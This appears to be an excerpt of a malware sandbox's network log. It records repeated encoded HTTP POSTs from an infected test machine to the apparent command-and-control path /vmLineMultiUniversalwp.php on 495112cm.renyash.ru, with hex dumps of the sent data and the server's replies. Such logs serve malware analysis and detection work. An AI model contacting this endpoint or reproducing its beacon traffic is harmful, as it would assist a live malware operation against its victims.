                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3690&min_rtt=1919&rtt_var=4263&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=90722&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          140192.168.2.450148104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:28.690932035 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:29.045684099 CET2520OUTData Raw: 51 5a 5e 57 55 5a 5a 54 5c 5b 52 58 57 5d 58 52 58 52 5a 5f 52 52 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QZ^WUZZT\[RXW]XRXRZ_RRQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@(*048Q2 8)<:51\$>;Q#=<,/\*& 7=-*+!Y#!Y,
                                                                                          Jan 4, 2025 11:09:29.135080099 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:29.360640049 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fI2t1GiBlV%2F4KINejx%2FVdYcGKk7NHVXOcB4NT%2BTHTX5%2FZKwZLLKYmS7tcg4q1GNEr1cMxDYuInesVFrjvxyLSgteRkqkD86Ql9uHD5mgLt4uBIsdaVMVVZqW%2BSN%2BG3s8fY2d6Ke7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eecd83e5e78-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1667&rtt_var=1208&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=365091&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          141192.168.2.450149104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:29.488266945 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:29.842552900 CET2520OUTData Raw: 54 5b 5e 5e 55 5e 5a 56 5c 5b 52 58 57 5b 58 5a 58 50 5a 52 52 54 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^^U^ZV\[RXW[XZXPZRRTQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=*3@ &%3#\(<16=:&-<!.R(*%<#-&X*!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:29.938638926 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:30.199486017 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EVd%2B2RGlJcWVFVLkWismiNhG7EcjDpDZB3ZpX%2BS6CYtXQ3sfLt9aDGZxUucvtPVKwZl%2BkWyIDDJ09fNMH8JqQ3uDGPZvZEBZ5C1rdP3OxzfD%2BYDxn5HqKLAtFHeegrdV8nydY0n"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ef1daf88cb1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4331&min_rtt=1962&rtt_var=5475&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=69786&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          142192.168.2.450150104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:30.328701019 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:30.687578917 CET2516OUTData Raw: 54 59 5e 52 50 5c 5a 50 5c 5b 52 58 57 5a 58 5c 58 54 5a 5b 52 50 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^RP\ZP\[RXWZX\XTZ[RPQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C>:/C7P&#*?.6.%[3=< >"?3^<&'7.&=!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:30.793955088 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:30.971450090 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9n1DDLiBTo%2FaPQ6W%2Fe7YHoN%2FJ91IYuPeCz8Pw4YfNmP5BKDgZihc9ukMfxM%2BHm8QcGZ2HlFXuD5BzA%2FTRxz9TyCMFdSxnksagL9qnYnHRG3%2BizrtfDm5omQURu81x%2F4NTvFurHR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ef72ea38cdc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3428&min_rtt=1979&rtt_var=3641&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=107550&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          143192.168.2.450151104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:31.098578930 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:31.451946020 CET2520OUTData Raw: 51 5d 5b 50 50 5e 5a 56 5c 5b 52 58 57 5e 58 5a 58 50 5a 5a 52 56 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q][PP^ZV\[RXW^XZXPZZRVQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D(977T&U8=<"=%\$<!.-(<? "=_=!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:31.575655937 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:31.847848892 CET809INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xmBnmwVtCirQYKDAmzoz%2B1VUiAXU2%2BM7J%2B%2BxDyP5Lzz0cl5TSbMgSzVEI09BurY8yoJC0Ya73y9gHLpkRQ8gdzMFjDqKksUnqHk8JaGz3Q%2BOqIVW3OYfODvpBBzNXzhyomxlFGIk"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6efc08a27279-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6752&min_rtt=5649&rtt_var=4324&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=100877&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          144192.168.2.450152104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:31.848490953 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:32.202939987 CET1844OUTData Raw: 54 5b 5b 55 55 5f 5a 5d 5c 5b 52 58 57 5b 58 5b 58 52 5a 5a 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[[UU_Z]\[RXW[X[XRZZRQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D= ;>% $)<.5=&.74>.W?<+]<8#-*+!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:32.293550968 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:32.610491991 CET955INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4Uz56rZuv0n07L%2F%2Bhu7KezKFsOsQ3tlAxKxEU8Vng9Rjpu7PJX0Ge1jNO%2FuQGm3AMPuQ7JTKA31f4rRolHU5VtSWWzgHpntlNNsPGAar43WTfY8k0eqNrpxESktTbcSEtS%2F1kqI"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f008ce6439f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1906&min_rtt=1751&rtt_var=967&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=487479&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1c 28 00 0a 51 35 06 24 10 3d 58 3a 59 25 56 24 13 2c 21 3b 5e 20 12 3c 03 2c 22 04 01 30 0d 2c 15 3d 01 30 57 20 20 2f 1d 30 0a 2a 5d 06 12 38 1d 3e 2f 3a 10 26 2b 25 0a 3d 0c 22 45 33 26 2a 5a 30 5b 2b 59 3f 12 39 5a 24 2c 2a 08 3e 2f 36 5e 39 5c 34 0b 2f 2c 30 1c 22 39 21 53 08 13 20 57 32 31 0d 10 3d 0e 22 03 26 0d 13 11 26 3a 0e 0c 29 06 30 19 30 07 3d 05 2d 21 3f 5d 2b 30 2b 00 2c 3e 2f 04 3c 3e 38 0e 27 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$(Q5$=X:Y%V$,!;^ <,"0,=0W /0*]8>/:&+%="E3&*Z0[+Y?9Z$,*>/6^9\4/,0"9!S W21="&&:)00=-!?]+0+,>/<>8'"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          145192.168.2.450153104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:31.968924046 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:32.326945066 CET2520OUTData Raw: 54 51 5e 5e 55 5f 5a 54 5c 5b 52 58 57 5f 58 5e 58 53 5a 53 52 51 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ^^U_ZT\[RXW_X^XSZSRQQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>904*1(>Z:5:'-+V#X&???\<&4)*;!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:32.412290096 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:32.589107037 CET803INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Be0MHO9CpXcD6%2BH8%2Fc4ULagvg22etqeC5AUK7baeqtYYOfLgVqiS0UrEwvYXkV6TBcXQ57cr4n9XdV2662bGxwAYYNXiayIvwrjbVvH6tJS4Pm1xaFtSjbRE5e3ZLV16r1ZCPybe"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f014d49c445-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2301&min_rtt=1507&rtt_var=2153&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=185750&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          146192.168.2.450154104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:32.719013929 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:33.076935053 CET2512OUTData Raw: 54 5d 5e 5f 55 5f 5a 55 5c 5b 52 58 57 5a 58 5a 58 50 5a 53 52 55 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T]^_U_ZU\[RXWZXZXPZSRUQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*9#;!'37(/*"-\03V7>)(<(<;"-&)!Y#!Y,6
                                                                                          Jan 4, 2025 11:09:33.183233976 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:33.361776114 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IvMT12ny7Ql50A1%2Fv%2Bk2cszKXQu7OKu3eSXXz0Hb7Z%2B9uRDCAXJP89Yi99ku6m6eYDfA%2BtZqQo6GTMCcod9eHi0B%2Bvt9z4uVbRWib9DeNroLB1WVPqmNxvgZ6vBgQOo2gr%2B%2Fkjkc"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f061e9b0f7d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2885&min_rtt=1572&rtt_var=3215&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2805&delivery_rate=120890&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          147192.168.2.450155104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:33.488331079 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:33.842590094 CET2520OUTData Raw: 54 51 5e 55 50 5f 5f 50 5c 5b 52 58 57 5f 58 5e 58 53 5a 52 52 54 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TQ^UP__P\[RXW_X^XSZRRTQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.(94#P1U *Z"-''R!."P</3_(&'4">+!Y#!Y,2
                                                                                          Jan 4, 2025 11:09:33.947079897 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:34.213927984 CET807INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRn8HR16W%2BQUHeHDa3ojawxJi6B0FzPfqy0v2ehGeCJ5ixiFVnffiV0u1ih8K9q%2FrHNxY2z%2Bt73sBv4XqosmweoGpB4CWdVsRce5bxlZWomA8Km%2BOXxXvbaDRUtgMX6RTSlTi6MB"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f0aef5543bc-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3297&min_rtt=1767&rtt_var=3723&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=104211&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          148192.168.2.450156104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:34.344669104 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:34.703591108 CET2520OUTData Raw: 51 5c 5e 56 50 58 5f 50 5c 5b 52 58 57 5c 58 59 58 57 5a 59 52 57 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^VPX_P\[RXW\XYXWZYRWQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z->47&0#_>16=$4="Q),++#_ .:^*;!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:34.809156895 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:34.989233971 CET811INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RLo6LpW9WFPa2Vn3l%2BzXv%2BadZV9ewzIbLqTw1XBhxADgK8%2BJpo8jdj07JdnEYkr4%2BR2%2FBcPFviopwASWvX%2Bro2b4vhzV2hIcVfSSP9viQRDRUo0f7m7shWUWHJad54GT0fAUWkSW"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6f104a180f49-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3094&min_rtt=1603&rtt_var=3583&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=107884&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          149192.168.2.450157104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:35.121694088 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
